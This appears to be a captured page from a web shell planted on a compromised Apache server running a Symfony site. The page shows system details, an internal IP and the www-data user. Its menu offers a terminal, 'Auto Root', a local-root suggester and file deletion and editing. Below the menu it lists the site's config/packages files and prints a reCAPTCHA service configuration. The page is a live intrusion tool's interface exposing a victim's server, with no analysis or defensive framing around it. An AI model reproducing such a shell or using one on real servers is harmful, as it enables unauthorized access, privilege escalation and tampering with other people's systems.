Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.217.79
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
config /
packages /
Delete
Unzip
Name
Size
Permission
Date
Action
dev
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
test
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
cache.yaml
687
B
-rwxrwxr-x
2025-06-19 08:10
debug.yaml
261
B
-rwxrwxr-x
2025-06-19 08:10
doctrine.yaml
6.66
KB
-rwxrwxr-x
2026-05-18 12:51
doctrine_migrations.yaml
268
B
-rwxrwxr-x
2025-06-19 08:10
ewz_recaptcha.yaml
191
B
-rwxrwxr-x
2025-06-19 08:10
framework.yaml
1.02
KB
-rwxrwxr-x
2026-04-02 11:48
google_recaptcha.yaml
988
B
-rwxrwxr-x
2025-06-19 08:10
league_oauth2_server.yaml
533
B
-rwxrwxr-x
2025-07-04 14:25
mailer.yaml
56
B
-rwxrwxr-x
2025-06-19 08:10
messenger.yaml
865
B
-rwxrwxr-x
2025-06-19 08:10
monolog.yaml
2.83
KB
-rwxrwxr-x
2026-04-02 11:48
nelmio_cors.yaml
323
B
-rwxrwxr-x
2025-07-04 14:25
notifier.yaml
357
B
-rwxrwxr-x
2025-06-19 08:10
nyholm_psr7.yaml
627
B
-rwxrwxr-x
2025-07-04 14:25
ramsey_uuid_doctrine.yaml
85
B
-rwxrwxr-x
2025-06-19 08:10
routing.yaml
335
B
-rwxrwxr-x
2025-06-19 08:10
security.yaml
3.33
KB
-rwxrwxr-x
2026-05-20 09:05
sonata_admin.yaml
293
B
-rwxrwxr-x
2025-07-04 14:25
sonata_block.yaml
17
B
-rwxrwxr-x
2026-05-18 12:51
sonata_form.yaml
37
B
-rwxrwxr-x
2025-06-19 08:10
translation.yaml
418
B
-rwxrwxr-x
2025-06-19 08:10
twig.yaml
873
B
-rwxrwxr-x
2026-05-18 12:51
uid.yaml
87
B
-rwxrwxr-x
2025-06-19 08:10
validator.yaml
354
B
-rwxrwxr-x
2025-06-19 08:10
web_profiler.yaml
337
B
-rwxrwxr-x
2025-06-19 08:10
webpack_encore.yaml
1.65
KB
-rwxrwxr-x
2025-06-19 08:10
Save
Rename
services: # Inject this service in your controllers/services to verify a submitted captcha. ReCaptcha\ReCaptcha: arguments: $secret: '%env(GOOGLE_RECAPTCHA_SECRET)%' $requestMethod: '@ReCaptcha\RequestMethod' # Curl is set here as default transport to communicate with Google servers. # If you do not have php-curl extension, you can change for a socket or a plain POST request. # Check out the repository for all other request methods: # https://github.com/google/recaptcha/tree/master/src/ReCaptcha/RequestMethod ReCaptcha\RequestMethod: '@ReCaptcha\RequestMethod\CurlPost' ReCaptcha\RequestMethod\CurlPost: null ReCaptcha\RequestMethod\Curl: null # Uncomment this line if you want to inject the site key to all your Twig templates. # You can also inject the "google_recaptcha_site_key" container parameter to your controllers. #twig: # globals: # google_recaptcha_site_key: '%google_recaptcha_site_key%'